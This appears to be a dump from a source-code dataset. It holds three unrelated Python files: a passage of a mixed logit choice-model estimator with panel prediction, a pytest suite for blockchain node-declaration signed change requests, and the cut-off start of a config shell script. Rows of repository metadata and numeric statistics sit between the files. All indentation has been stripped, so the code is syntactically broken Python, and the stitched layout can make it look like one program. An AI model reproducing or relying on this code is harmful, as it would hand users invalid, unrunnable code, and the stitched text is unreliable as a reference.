zero_vector : 1D ndarray.
Determines what is viewed as a "null" set of parameters. It is
explicitly passed because some parameters (e.g. parameters that must be
greater than zero) have their null values at values other than zero.
split_params : callable.
Should take a vector of parameters, `mapping_res['rows_to_alts']`, and
model_obj.design as arguments. Should return a tuple containing
separate arrays for the model's shape, outside intercept, and index
coefficients. For each of these arrays, if this model does not contain
the particular type of parameter, the callable should place a `None` in
its place in the tuple.
constrained_pos : list or None, optional.
Denotes the positions of the array of estimated parameters that are
not to change from their initial values. If a list is passed, the
elements are to be integers where no such integer is greater than
`init_values.size.` Default == None.
weights : 1D ndarray or None, optional.
Allows for the calculation of weighted log-likelihoods. The weights can
represent various things. In stratified samples, the weights may be
the proportion of the observations in a given strata for a sample in
relation to the proportion of observations in that strata in the
population. In latent class models, the weights may be the probability
of being a particular class.
"""
def __init__(self,
model_obj,
mapping_dict,
ridge,
zero_vector,
split_params,
constrained_pos=None,
weights=None):
super(MixedEstimator, self).__init__(model_obj,
mapping_dict,
ridge,
zero_vector,
split_params,
constrained_pos=constrained_pos,
weights=weights)
# Add the 3d design matrix to the object
self.design_3d = model_obj.design_3d
return None
def convenience_split_params(self, params, return_all_types=False):
"""
Splits parameter vector into shape, intercept, and index parameters.
Parameters
----------
params : 1D ndarray.
The array of parameters being estimated or used in calculations.
return_all_types : bool, optional.
Determines whether or not a tuple of 4 elements will be returned
(with one element for the nest, shape, intercept, and index
parameters for this model). If False, a tuple of 3 elements will
be returned with one element for the shape, intercept, and index
parameters.
Returns
-------
tuple. Will have 4 or 3 elements based on `return_all_types`.
"""
return self.split_params(params,
return_all_types=return_all_types)
def check_length_of_initial_values(self, init_values):
"""
Ensures that the initial values are of the correct length.
"""
return check_length_of_init_values(self.design_3d, init_values)
def convenience_calc_probs(self, params):
"""
Calculates the probabilities of the chosen alternative, and the long
format probabilities for this model and dataset.
"""
shapes, intercepts, betas = self.convenience_split_params(params)
prob_args = (betas,
self.design_3d,
self.alt_id_vector,
self.rows_to_obs,
self.rows_to_alts,
self.utility_transform)
prob_kwargs = {"chosen_row_to_obs": self.chosen_row_to_obs,
"return_long_probs": True}
probability_results = general_calc_probabilities(*prob_args,
**prob_kwargs)
return probability_results
def convenience_calc_log_likelihood(self, params):
"""
Calculates the log-likelihood for this model and dataset.
"""
shapes, intercepts, betas = self.convenience_split_params(params)
args = [betas,
self.design_3d,
self.alt_id_vector,
self.rows_to_obs,
self.rows_to_alts,
self.rows_to_mixers,
self.choice_vector,
self.utility_transform]
kwargs = {"ridge": self.ridge, "weights": self.weights}
log_likelihood = general_log_likelihood(*args, **kwargs)
return log_likelihood
def convenience_calc_gradient(self, params):
"""
Calculates the gradient of the log-likelihood for this model / dataset.
"""
shapes, intercepts, betas = self.convenience_split_params(params)
args = [betas,
self.design_3d,
self.alt_id_vector,
self.rows_to_obs,
self.rows_to_alts,
self.rows_to_mixers,
self.choice_vector,
self.utility_transform]
return general_gradient(*args, ridge=self.ridge, weights=self.weights)
def convenience_calc_hessian(self, params):
"""
Calculates the hessian of the log-likelihood for this model / dataset.
Note that this function name is INCORRECT with regard to the actual
actions performed. The Mixed Logit model uses the BHHH approximation
to the Fisher Information Matrix in place of the actual hessian.
"""
shapes, intercepts, betas = self.convenience_split_params(params)
args = [betas,
self.design_3d,
self.alt_id_vector,
self.rows_to_obs,
self.rows_to_alts,
self.rows_to_mixers,
self.choice_vector,
self.utility_transform]
approx_hess =\
general_bhhh(*args, ridge=self.ridge, weights=self.weights)
# Account for the constrained position when presenting the results of
# the approximate hessian.
if self.constrained_pos is not None:
for idx_val in self.constrained_pos:
approx_hess[idx_val, :] = 0
approx_hess[:, idx_val] = 0
approx_hess[idx_val, idx_val] = -1
return approx_hess
def convenience_calc_fisher_approx(self, params):
"""
Calculates the BHHH approximation of the Fisher Information Matrix for
this model / dataset. Note that this function name is INCORRECT with
regard to the actual actions performed. The Mixed Logit model uses a
placeholder for the BHHH approximation of the Fisher Information Matrix
because the BHHH approximation is already being used to approximate the
hessian.
This placeholder allows calculation of a value for the 'robust'
standard errors, even though such a value is not useful since it is not
correct...
"""
shapes, intercepts, betas = self.convenience_split_params(params)
placeholder_bhhh = np.diag(-1 * np.ones(betas.shape[0]))
return placeholder_bhhh
class MixedLogit(base_mcm.MNDC_Model):
"""
Parameters
----------
data : string or pandas dataframe.
If string, data should be an absolute or relative path to a CSV
file containing the long format data for this choice model. Note
long format has one row per available alternative for each
observation. If pandas dataframe, the dataframe should be the long
format data for the choice model.
alt_id_col : str.
Should denote the column in data which contains the alternative
identifiers for each row.
obs_id_col : str.
Should denote the column in data which contains the observation
identifiers for each row.
choice_col : str.
Should denote the column in data which contains the ones and zeros
that denote whether or not the given row corresponds to the chosen
alternative for the given individual.
specification : OrderedDict.
Keys are a proper subset of the columns in long_form_df. Values are
either a list or a single string, `all_diff` or `all_same`. If a
list, the elements should be one of the following:
- single objects that are within the alternative ID
column of long_form_df
- lists of objects that are within the alternative
ID column of long_form_df.
For each single object in the list, a unique column will be created
(i.e. there will be a unique coefficient for that variable in the
corresponding utility equation of the corresponding alternative).
For lists within the specification_dict values, a single column
will be created for all the alternatives within iterable (i.e.
there will be one common coefficient for the variables in the
iterable).
names : OrderedDict, optional.
Should have the same keys as `specification_dict`. For each key:
- if the corresponding value in specification_dict is "all_same",
then there should be a single string as the value in names.
- if the corresponding value in specification_dict is "all_diff",
then there should be a list of strings as the value in names.
There should be one string in the value in names for each
- if the corresponding value in specification_dict is a list, then
there should be a list of strings as the value in names. There
should be one string in the value in names per item in the value
in specification_dict. Default == None.
mixing_id_col : str, or None, optional.
Should be a column heading in `data`. Should denote the column in
`data` which contains the identifiers of the units of observation over
which the coefficients of the model are thought to be randomly
distributed. If `model_type == "Mixed Logit"`, then `mixing_id_col`
must be passed. Default == None.
mixing_vars : list, or None, optional.
All elements of the list should be strings. Each string should be
present in the values of `names.values()` and they're associated
variables should only be index variables (i.e. part of the design
matrix). If `model_type == "Mixed Logit"`, then `mixing_vars` must be
passed. Default == None.
Methods
-------
panel_predict(new_data, num_draws, return_long_probs, choice_col, seed)
Predicts the probability of each individual in `new_data` making each
possible choice in each choice situation they are faced with. This
method differs from the `predict()` function by using 'individualized
coefficient distributions' that are conditioned on each person's past
choices and choice situations (if there are any).
"""
def __init__(self,
data,
alt_id_col,
obs_id_col,
choice_col,
specification,
names=None,
mixing_id_col=None,
mixing_vars=None,
*args, **kwargs):
##########
# Print a helpful message for users who have included shape parameters
# or shape names unneccessarily
##########
for keyword in ["shape_names", "shape_ref_pos"]:
if keyword in kwargs and kwargs[keyword] is not None:
warnings.warn(_shape_ignore_msg)
break
if "intercept_ref_pos" in kwargs:
if kwargs["intercept_ref_pos"] is not None:
msg = "All Mixed Logit intercepts should be in the index. "
msg_2 = "intercept_ref_pos should be None."
raise ValueError(msg + msg_2)
# Carry out the common instantiation process for all choice models
model_name = model_type_to_display_name["Mixed Logit"]
super(MixedLogit, self).__init__(data,
alt_id_col,
obs_id_col,
choice_col,
specification,
names=names,
model_type=model_name,
mixing_id_col=mixing_id_col,
mixing_vars=mixing_vars)
# Store the utility transform function
self.utility_transform = mnl_utility_transform
return None
def fit_mle(self,
init_vals,
num_draws,
seed=None,
constrained_pos=None,
print_res=True,
method="BFGS",
loss_tol=1e-06,
gradient_tol=1e-06,
maxiter=1000,
ridge=None,
just_point=False,
**kwargs):
"""
Parameters
----------
init_vals : 1D ndarray.
Should contain the initial values to start the optimization process
with. There should be one value for each utility coefficient and
shape parameter being estimated.
num_draws : int.
Should be greater than zero. Denotes the number of draws that we
are making from each normal distribution.
seed : int or None, optional.
If an int is passed, it should be greater than zero. Denotes the
value to be used in seeding the random generator used to generate
the draws from the normal distribution. Default == None.
constrained_pos : list or None, optional.
Denotes the positions of the array of estimated parameters that are
not to change from their initial values. If a list is passed, the
elements are to be integers where no such integer is greater than
`init_values.size.` Default == None.
print_res : bool, optional.
Determines whether the timing and initial and final log likelihood
results will be printed as they they are determined.
method : str, optional.
Should be a valid string which can be passed to
scipy.optimize.minimize. Determines the optimization algorithm
that is used for this problem.
loss_tol : float, optional.
Determines the tolerance on the difference in objective function
values from one iteration to the next which is needed to determine
convergence. Default = 1e-06.
gradient_tol : float, optional.
Determines the tolerance on the difference in gradient values from
one iteration to the next which is needed to determine convergence.
Default = 1e-06.
maxiter : int, optional.
Denotes the maximum number of iterations of the algorithm specified
by `method` that will be used to estimate the parameters of the
given model. Default == 1000.
ridge : int, float, long, or None, optional.
Determines whether or not ridge regression is performed. If a float
is passed, then that float determines the ridge penalty for the
optimization. Default = None.
just_point : bool, optional.
Determines whether (True) or not (False) calculations that are non-
critical for obtaining the maximum likelihood point estimate will
be performed. If True, this function will return the results
dictionary from scipy.optimize. Default == False.
Returns
-------
None. Estimation results are saved to the model instance.
"""
# Check integrity of passed arguments
kwargs_to_be_ignored = ["init_shapes", "init_intercepts", "init_coefs"]
if any([x in kwargs for x in kwargs_to_be_ignored]):
msg = "MNL model does not use of any of the following kwargs:\n{}"
msg_2 = "Remove such kwargs and pass a single init_vals argument"
raise ValueError(msg.format(kwargs_to_be_ignored) + msg_2)
# Store the optimization method
self.optimization_method = method
# Store the ridge parameter
self.ridge_param = ridge
if ridge is not None:
warnings.warn(_ridge_warning_msg)
# Construct the mappings from alternatives to observations and from
# chosen alternatives to observations
mapping_res = self.get_mappings_for_fit()
rows_to_mixers = mapping_res["rows_to_mixers"]
# Get the draws for each random coefficient
num_mixing_units = rows_to_mixers.shape[1]
draw_list = mlc.get_normal_draws(num_mixing_units,
num_draws,
len(self.mixing_pos),
seed=seed)
# Create the 3D design matrix
self.design_3d = mlc.create_expanded_design_for_mixing(self.design,
draw_list,
self.mixing_pos,
rows_to_mixers)
# Create the estimation object
zero_vector = np.zeros(init_vals.shape)
mixl_estimator = MixedEstimator(self,
mapping_res,
ridge,
zero_vector,
split_param_vec,
constrained_pos=constrained_pos)
# Perform one final check on the length of the initial values
mixl_estimator.check_length_of_initial_values(init_vals)
# Get the estimation results
estimation_res = estimate(init_vals,
mixl_estimator,
method,
loss_tol,
gradient_tol,
maxiter,
print_res,
use_hessian=True,
just_point=just_point)
if not just_point:
# Store the mixed logit specific estimation results
args = [mixl_estimator, estimation_res]
estimation_res = add_mixl_specific_results_to_estimation_res(*args)
# Store the estimation results
self.store_fit_results(estimation_res)
return None
else:
return estimation_res
def __filter_past_mappings(self,
past_mappings,
long_inclusion_array):
"""
Parameters
----------
past_mappings : dict.
All elements should be None or compressed sparse row matrices from
scipy.sparse. The following keys should be in past_mappings:
- "rows_to_obs",
- "rows_to_alts",
- "chosen_rows_to_obs",
- "rows_to_nests",
- "rows_to_mixers"
The values that are not None should be 'mapping' matrices that
denote which rows of the past long-format design matrix belong to
which unique object such as unique observations, unique
alternatives, unique nests, unique 'mixing' units etc.
long_inclusion_array : 1D ndarray.
Should denote, via a `1`, the rows of the past mapping matrices
that are to be included in the filtered mapping matrices.
Returns
-------
new_mappings : dict.
The returned dictionary will be the same as `past_mappings` except
that all the mapping matrices will have been filtered according to
`long_inclusion_array`.
"""
new_mappings = {}
for key in past_mappings:
if past_mappings[key] is None:
new_mappings[key] = None
else:
mask_array = long_inclusion_array[:, None]
orig_map = past_mappings[key]
# Initialize the resultant array that is desired
new_map = orig_map.multiply(np.tile(mask_array,
(1, orig_map.shape[1]))).A
# Perform the desired filtering
current_filter = (new_map.sum(axis=1) != 0)
if current_filter.shape[0] > 0:
current_filter = current_filter.ravel()
new_map = new_map[current_filter, :]
# Do the second filtering
current_filter = (new_map.sum(axis=0) != 0)
if current_filter.shape[0] > 0:
current_filter = current_filter.ravel()
new_map = new_map[:, current_filter]
new_mappings[key] = csr_matrix(new_map)
return new_mappings
def panel_predict(self,
data,
num_draws,
return_long_probs=True,
choice_col=None,
seed=None):
"""
Parameters
----------
data : string or pandas dataframe.
If string, data should be an absolute or relative path to a CSV
file containing the long format data to be predicted with this
choice model. Note long format has one row per available
alternative for each observation. If pandas dataframe, the
dataframe should be in long format.
num_draws : int.
Should be greater than zero. Denotes the number of draws being
made from each mixing distribution for the random coefficients.
return_long_probs : bool, optional.
Indicates whether or not the long format probabilites (a 1D numpy
array with one element per observation per available alternative)
should be returned. Default == True.
choice_col : str or None, optonal.
Denotes the column in long_form which contains a one if the
alternative pertaining to the given row was the observed outcome
for the observation pertaining to the given row and a zero
otherwise. If passed, then an array of probabilities of just the
chosen alternative for each observation will be returned.
Default == None.
seed : int or None, optional.
If an int is passed, it should be greater than zero. Denotes the
value to be used in seeding the random generator used to generate
the draws from the mixing distributions of each random coefficient.
Default == None.
Returns
-------
numpy array or tuple of two numpy arrays.
- If `choice_col` is passed AND `return_long_probs` is True, then
the tuple `(chosen_probs, pred_probs_long)` is returned.
- If `return_long_probs` is True and `choice_col` is None, then
only `pred_probs_long` is returned.
- If `choice_col` is passed and `return_long_probs` is False then
`chosen_probs` is returned.
`chosen_probs` is a 1D numpy array of shape (num_observations,).
Each element is the probability of the corresponding observation
being associated with its realized outcome.
`pred_probs_long` is a 1D numpy array with one element per
observation per available alternative for that observation. Each
element is the probability of the corresponding observation being
associated with that row's corresponding alternative.
Notes
-----
It is NOT valid to have `choice_col == None` and
`return_long_probs == False`.
"""
# Ensure that the function arguments are valid
if choice_col is None and not return_long_probs:
msg = "choice_col is None AND return_long_probs == False"
raise ValueError(msg)
# Get the dataframe of observations we'll be predicting on
dataframe = get_dataframe_from_data(data)
# Determine the conditions under which we will add an intercept column
# to our long format dataframe.
condition_1 = "intercept" in self.specification
condition_2 = "intercept" not in dataframe.columns
if condition_1 and condition_2:
dataframe["intercept"] = 1.0
# Make sure the necessary columns are in the long format dataframe
for column in [self.alt_id_col,
self.obs_id_col,
self.mixing_id_col]:
if column is not None and column not in dataframe.columns:
msg = "{} not in data.columns".format(column)
raise ValueError(msg)
# Get the new column of alternative IDs and get the new design matrix
new_alt_IDs = dataframe[self.alt_id_col].values
new_design_res = create_design_matrix(dataframe,
self.specification,
self.alt_id_col,
names=self.name_spec)
new_design_2d = new_design_res[0]
# Get the new mappings between the alternatives and observations
mapping_res = create_long_form_mappings(dataframe,
self.obs_id_col,
self.alt_id_col,
choice_col=choice_col,
nest_spec=self.nest_spec,
mix_id_col=self.mixing_id_col)
new_rows_to_obs = mapping_res["rows_to_obs"]
new_rows_to_alts = mapping_res["rows_to_alts"]
new_chosen_to_obs = mapping_res["chosen_row_to_obs"]
new_rows_to_mixers = mapping_res["rows_to_mixers"]
# Determine the coefficients being used for prediction.
# Note that I am making an implicit assumption (for now) that the
# kernel probabilities are coming from a logit-type model.
new_index_coefs = self.coefs.values
new_intercepts = (self.intercepts.values if self.intercepts
is not None else None)
new_shape_params = (self.shapes.values if self.shapes
is not None else None)
# Get the draws for each random coefficient
num_mixing_units = new_rows_to_mixers.shape[1]
draw_list = mlc.get_normal_draws(num_mixing_units,
num_draws,
len(self.mixing_pos),
seed=seed)
# Calculate the 3D design matrix for the prediction.
design_args = (new_design_2d,
draw_list,
self.mixing_pos,
new_rows_to_mixers)
new_design_3d = mlc.create_expanded_design_for_mixing(*design_args)
# Calculate the desired probabilities for the mixed logit model.
prob_args = (new_index_coefs,
new_design_3d,
new_alt_IDs,
new_rows_to_obs,
new_rows_to_alts,
mnl_utility_transform)
prob_kwargs = {"intercept_params": new_intercepts,
"shape_params": new_shape_params,
"return_long_probs": True}
# Note that I am making an implicit assumption (for now) that the
# kernel probabilities are coming from a logit-type model.
new_kernel_probs = general_calc_probabilities(*prob_args,
**prob_kwargs)
# Initialize and calculate the weights needed for prediction with
# "individualized" coefficient distributions. Should have shape
# (new_row_to_mixer.shape[1], num_draws)
weights_per_ind_per_draw = (1.0 / num_draws *
np.ones((new_rows_to_mixers.shape[1],
num_draws)))
##########
# Create an array denoting the observation ids that are present in both
# the dataset to be predicted and the dataset used for model estimation
##########
# Get the old mixing ids
old_mixing_id_long = self.data[self.mixing_id_col].values
# Get the new mixing ids
new_mixing_id_long = dataframe[self.mixing_id_col].values
# Get the unique individual ids from the original and preserve order
orig_unique_id_idx_old = np.sort(np.unique(old_mixing_id_long,
return_index=True)[1])
orig_unique_id_idx_new = np.sort(np.unique(new_mixing_id_long,
return_index=True)[1])
# Get the unique ids, in their original order of appearance
orig_order_unique_ids_old = old_mixing_id_long[orig_unique_id_idx_old]
orig_order_unique_ids_new = new_mixing_id_long[orig_unique_id_idx_new]
# Figure out which long format rows have ids are common to both
# datasets
old_repeat_mixing_id_idx = np.in1d(old_mixing_id_long,
orig_order_unique_ids_new)
# Figure out which unique ids are in both datasets
old_unique_mix_id_repeats = np.in1d(orig_order_unique_ids_old,
orig_order_unique_ids_new)
new_unique_mix_id_repeats = np.in1d(orig_order_unique_ids_new,
orig_order_unique_ids_old)
# Get the 2d design matrix used to estimate the model, and filter it
# to only those individuals for whom we are predicting new choice
# situations.
past_design_2d = self.design[old_repeat_mixing_id_idx, :]
##########
# Appropriately filter the old mapping matrix that maps rows of the
# long format design matrix to unique mixing units.
##########
orig_mappings = self.get_mappings_for_fit()
past_mappings = self.__filter_past_mappings(orig_mappings,
old_repeat_mixing_id_idx)
# Create the 3D design matrix for those choice situations, using the
# draws that were just taken from the mixing distributions of interest.
past_draw_list = [x[new_unique_mix_id_repeats, :] for x in draw_list]
design_args = (past_design_2d,
past_draw_list,
self.mixing_pos,
past_mappings["rows_to_mixers"])
past_design_3d = mlc.create_expanded_design_for_mixing(*design_args)
# Get the kernel probabilities of each of the alternatives for each
# each of the previoius choice situations, given the current draws of
# of the random coefficients
prob_args = (new_index_coefs,
past_design_3d,
self.alt_IDs[old_repeat_mixing_id_idx],
past_mappings["rows_to_obs"],
past_mappings["rows_to_alts"],
mnl_utility_transform)
prob_kwargs = {"return_long_probs": True}
past_kernel_probs = mlc.general_calc_probabilities(*prob_args,
**prob_kwargs)
##########
# Calculate the old sequence probabilities of all the individual's
# for whom we have recorded observations and for whom we are predicting
# future choice situations
##########
past_choices = self.choices[old_repeat_mixing_id_idx]
sequence_args = (past_kernel_probs,
past_choices,
past_mappings["rows_to_mixers"])
seq_kwargs = {"return_type": 'all'}
old_sequence_results = mlc.calc_choice_sequence_probs(*sequence_args,
**seq_kwargs)
# Note sequence_probs_per_draw should have shape
past_sequence_probs_per_draw = old_sequence_results[1]
# Calculate the weights for each individual who has repeat observations
# in the previously observed dataset
past_weights = (past_sequence_probs_per_draw /
past_sequence_probs_per_draw.sum(axis=1)[:, None])
# Rearrange the past weights to match the current ordering of the
# unique observations
rel_new_ids = orig_order_unique_ids_new[new_unique_mix_id_repeats]
num_rel_new_id = rel_new_ids.shape[0]
new_unique_mix_id_repeats_2d = rel_new_ids.reshape((num_rel_new_id, 1))
rel_old_ids = orig_order_unique_ids_old[old_unique_mix_id_repeats]
num_rel_old_id = rel_old_ids.shape[0]
old_unique_mix_id_repeats_2d = rel_old_ids.reshape((1, num_rel_old_id))
new_to_old_repeat_ids = csr_matrix(new_unique_mix_id_repeats_2d ==
old_unique_mix_id_repeats_2d)
past_weights = new_to_old_repeat_ids.dot(past_weights)
# Map these weights to earlier initialized weights
weights_per_ind_per_draw[new_unique_mix_id_repeats, :] = past_weights
# Create a 'long' format version of the weights array. This version
# should have the same number of rows as the new kernel probs but the
# same number of columns as the weights array (aka the number of draws)
weights_per_draw = new_rows_to_mixers.dot(weights_per_ind_per_draw)
# Calculate the predicted probabilities of each alternative for each
# choice situation being predicted
pred_probs_long = (weights_per_draw * new_kernel_probs).sum(axis=1)
# Note I am assuming pred_probs_long should be 1D (as should be the
# case if we are predicting with one set of betas and one 2D data
# object)
pred_probs_long = pred_probs_long.ravel()
# Format the returned objects according to the user's desires.
if new_chosen_to_obs is None:
chosen_probs = None
else:
# chosen_probs will be of shape (num_observations,)
chosen_probs = new_chosen_to_obs.transpose().dot(pred_probs_long)
if len(chosen_probs.shape) > 1 and chosen_probs.shape[1] > 1:
pass
else:
chosen_probs = chosen_probs.ravel()
# Return the long form and chosen probabilities if desired
if return_long_probs and chosen_probs is not None:
return chosen_probs, pred_probs_long
# If working with predictions, return just the long form probabilities
elif return_long_probs and chosen_probs is None:
return pred_probs_long
# If estimating the model and storing fitted probabilities or
# testing the model on data for which we know the chosen alternative,
# just return the chosen probabilities.
elif chosen_probs is not None:
return chosen_probs
| 44.979167 | 79 | 0.612297 | 5,293 | 43,180 | 4.788022 | 0.118458 | 0.009707 | 0.008523 | 0.007103 | 0.360178 | 0.283905 | 0.261571 | 0.225861 | 0.206092 | 0.194847 | 0 | 0.005837 | 0.333488 | 43,180 | 959 | 80 | 45.026069 | 0.874739 | 0.482145 | 0 | 0.28836 | 0 | 0 | 0.050646 | 0.002343 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042328 | false | 0.007937 | 0.034392 | 0 | 0.134921 | 0.005291 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4174d02ae022627c9a3fdf728ab8801e521bd891 | 7,836 | py | Python | node/blockchain/tests/test_models/test_signed_change_request/test_node_declaration.py | thenewboston-developers/Node | e71a405f4867786a54dd17ddd97595dd3a630018 | [
"MIT"
] | 18 | 2021-11-30T04:02:13.000Z | 2022-03-24T12:33:57.000Z | node/blockchain/tests/test_models/test_signed_change_request/test_node_declaration.py | thenewboston-developers/Node | e71a405f4867786a54dd17ddd97595dd3a630018 | [
"MIT"
] | 1 | 2022-02-04T17:07:38.000Z | 2022-02-04T17:07:38.000Z | node/blockchain/tests/test_models/test_signed_change_request/test_node_declaration.py | thenewboston-developers/Node | e71a405f4867786a54dd17ddd97595dd3a630018 | [
"MIT"
] | 5 | 2022-01-31T05:28:13.000Z | 2022-03-08T17:25:31.000Z | import json
import re
import pytest
from pydantic import ValidationError
from node.blockchain.inner_models import (
NodeDeclarationSignedChangeRequest, NodeDeclarationSignedChangeRequestMessage, SignedChangeRequest
)
from node.blockchain.mixins.crypto import HashableStringWrapper
from node.blockchain.tests.test_models.base import CREATE, VALID, node_declaration_message_type_validation_parametrizer
def test_create_from_node_declaration_signed_change_request_message(
node_declaration_signed_change_request_message, regular_node_key_pair
):
signed_change_request = SignedChangeRequest.create_from_signed_change_request_message(
message=node_declaration_signed_change_request_message,
signing_key=regular_node_key_pair.private,
)
assert isinstance(signed_change_request, NodeDeclarationSignedChangeRequest)
assert signed_change_request.message == node_declaration_signed_change_request_message
assert signed_change_request.signer == regular_node_key_pair.public
assert signed_change_request.signature == (
'e6f950cce5fbe79ebc58dbd317ba7dec5baf6387bfeeb4656d73c8790d2564a4'
'44f8c702b3e3ca931b5bb6e534781a135d5c17c4ff03886a80f32643dbd8fe0d'
)
def test_serialize_and_deserialize_node_declaration(
regular_node_declaration_signed_change_request, regular_node_key_pair
):
assert isinstance(regular_node_declaration_signed_change_request, NodeDeclarationSignedChangeRequest)
serialized = regular_node_declaration_signed_change_request.json()
deserialized = SignedChangeRequest.parse_raw(serialized)
assert isinstance(deserialized, NodeDeclarationSignedChangeRequest)
assert deserialized.signer == regular_node_declaration_signed_change_request.signer
assert deserialized.signature == regular_node_declaration_signed_change_request.signature
assert deserialized.message == regular_node_declaration_signed_change_request.message
assert deserialized == regular_node_declaration_signed_change_request
serialized2 = deserialized.json()
assert serialized == serialized2
def test_node_does_not_serialize_identifier(regular_node_declaration_signed_change_request, regular_node_key_pair):
assert isinstance(regular_node_declaration_signed_change_request, NodeDeclarationSignedChangeRequest)
serialized = regular_node_declaration_signed_change_request.dict()
assert 'identifier' not in serialized['message']['node']
serialized_json = regular_node_declaration_signed_change_request.json()
serialized = json.loads(serialized_json)
assert 'identifier' not in serialized['message']['node']
def test_signature_validation_node_declaration(
node_declaration_signed_change_request_message, primary_validator_key_pair
):
signed_change_request_template = NodeDeclarationSignedChangeRequest.create_from_signed_change_request_message(
message=node_declaration_signed_change_request_message,
signing_key=primary_validator_key_pair.private,
)
with pytest.raises(ValidationError) as exc_info:
NodeDeclarationSignedChangeRequest(
signer=signed_change_request_template.signer,
signature='0' * 128,
message=signed_change_request_template.message,
)
assert re.search(r'__root__.*Invalid signature', str(exc_info.value), flags=re.DOTALL)
with pytest.raises(ValidationError) as exc_info:
NodeDeclarationSignedChangeRequest(
signer='0' * 64,
signature=signed_change_request_template.signature,
message=signed_change_request_template.message,
)
assert re.search(r'__root__.*Invalid signature', str(exc_info.value), flags=re.DOTALL)
message = NodeDeclarationSignedChangeRequestMessage(
node=signed_change_request_template.message.node,
account_lock='0' * 64,
type=signed_change_request_template.message.type,
)
with pytest.raises(ValidationError) as exc_info:
NodeDeclarationSignedChangeRequest(
signer=signed_change_request_template.signer,
signature=signed_change_request_template.signature,
message=message,
)
assert re.search(r'__root__.*Invalid signature', str(exc_info.value), flags=re.DOTALL)
@node_declaration_message_type_validation_parametrizer
def test_type_validation_for_node_declaration_message_on_parsing(
id_, regular_node, node, node_identifier, node_addresses, node_fee, account_lock, search_re
):
if node is CREATE and node_identifier is not VALID: # Skip not applicable tests
return
regular_node_dict = regular_node.dict()
del regular_node_dict['identifier']
serialized = {
'signer': '0' * 64,
'signature': '0' * 128,
'message': {
'type':
1,
'account_lock':
regular_node.identifier if account_lock is VALID else account_lock,
'node':
regular_node_dict if node is VALID else ({
'addresses': regular_node.addresses if node_addresses is VALID else node_addresses,
'fee': regular_node.fee if node_fee is VALID else node_fee,
} if node is CREATE else node)
}
}
serialized_json = json.dumps(serialized)
with pytest.raises(ValidationError) as exc_info:
SignedChangeRequest.parse_raw(serialized_json)
assert re.search(search_re, str(exc_info.value), flags=re.DOTALL)
@pytest.mark.parametrize(
'id_, signer, signature, type_, search_re',
(
# signer
(1, None, '0' * 128, 1, r'signer.*none is not an allowed value'),
(2, 1, '0' * 128, 1, r'signer.*str type expected'),
(3, '', '0' * 128, 1, r'signer.*ensure this value has at least 64 characters'),
(4, 'ab', '0' * 128, 1, r'signer.*ensure this value has at least 64 characters'),
# signature
(5, '0' * 64, None, 1, r'signature.*none is not an allowed value'),
(6, '0' * 64, 1, 1, r'signature.*str type expected'),
(7, '0' * 64, '', 1, r'signature.*ensure this value has at least 128 characters'),
(8, '0' * 64, 'ab', 1, r'signature.*ensure this value has at least 128 characters'),
# type_
(9, '0' * 64, '0' * 128, None, r'type.*none is not an allowed value'),
(10, '0' * 64, '0' * 128, '', r'type.*value is not a valid integer'),
(11, '0' * 64, '0' * 128, '1', r'type.*value is not a valid integer'),
(12, '0' * 64, '0' * 128, 0, r'GenesisSignedChangeRequest.*field required'),
(13, '0' * 64, '0' * 128, 1000, r'type.*value is not a valid enumeration member'),
(14, '0' * 64, '0' * 128, -1, r'type.*value is not a valid enumeration member'),
)
)
def test_type_validation_for_node_declaration_on_parsing(id_, regular_node, signer, signature, type_, search_re):
node = regular_node.dict()
del node['identifier']
serialized = {
'signer': signer,
'signature': signature,
'message': {
'type': type_,
'account_lock': regular_node.identifier,
'node': node
}
}
serialized_json = json.dumps(serialized)
with pytest.raises(ValidationError) as exc_info:
SignedChangeRequest.parse_raw(serialized_json)
assert re.search(search_re, str(exc_info.value), flags=re.DOTALL)
def test_hashing_does_not_include_node_identifier(regular_node_declaration_signed_change_request):
request_dict = regular_node_declaration_signed_change_request.dict()
assert 'identifier' not in request_dict['message']['node']
hashing_string = json.dumps(request_dict, separators=(',', ':'), sort_keys=True)
expected_hash = HashableStringWrapper(hashing_string).make_hash()
assert regular_node_declaration_signed_change_request.make_hash() == expected_hash
| 44.777143 | 119 | 0.727667 | 911 | 7,836 | 5.92865 | 0.149287 | 0.079985 | 0.126643 | 0.099981 | 0.591372 | 0.534716 | 0.479911 | 0.408628 | 0.381781 | 0.356786 | 0 | 0.032712 | 0.184661 | 7,836 | 174 | 120 | 45.034483 | 0.812647 | 0.006126 | 0 | 0.256944 | 0 | 0 | 0.133368 | 0.020686 | 0 | 0 | 0 | 0 | 0.145833 | 1 | 0.048611 | false | 0 | 0.048611 | 0 | 0.104167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41754b7be3194cb3183aea7d9f558b7b18c2dc8f | 1,742 | py | Python | CodeComb_Core/config_shell.py | amartyaamp/CodeComb | 33fd50b91edd60dd08b1f4decc35e2fcf5f1a78d | [
"MIT"
] | 1 | 2019-09-06T07:14:57.000Z | 2019-09-06T07:14:57.000Z | CodeComb_Core/config_shell.py | amartyaamp/CodeComb | 33fd50b91edd60dd08b1f4decc35e2fcf5f1a78d | [
"MIT"
] | 12 | 2019-09-10T04:07:51.000Z | 2019-12-13T03:04:49.000Z | CodeComb_Core/config_shell.py | amartyaamp/CodeComb | 33fd50b91edd60dd08b1f4decc35e2fcf5f1a78d | [
"MIT"
] | 1 | 2019-09-11T04:12:03.000Z | 2019-09-11T04:12:03.000Z | import os
from pyfiglet import figlet_format
import cutie
import configparser
## Either colorama or termcolor
try:
import colorama
colorama.init()
except ImportError:
colorama = None
try:
from termcolor import colored
except ImportError:
colored = None
## Set the format config
def set_format():
format_opts = {"C++":"cpp", "Python":"py", "C#":"cs", "Java":"java"}
print(colored('Choose filetype (use up/down keys):', 'yellow'))
format_keys = list(format_opts.keys())
answers = cutie.select_multiple(format_keys)
## Store the config file
config = configparser.ConfigParser()
home = os.path.expanduser("~")
config_file = os.path.join(home, "codecomb_config.ini")
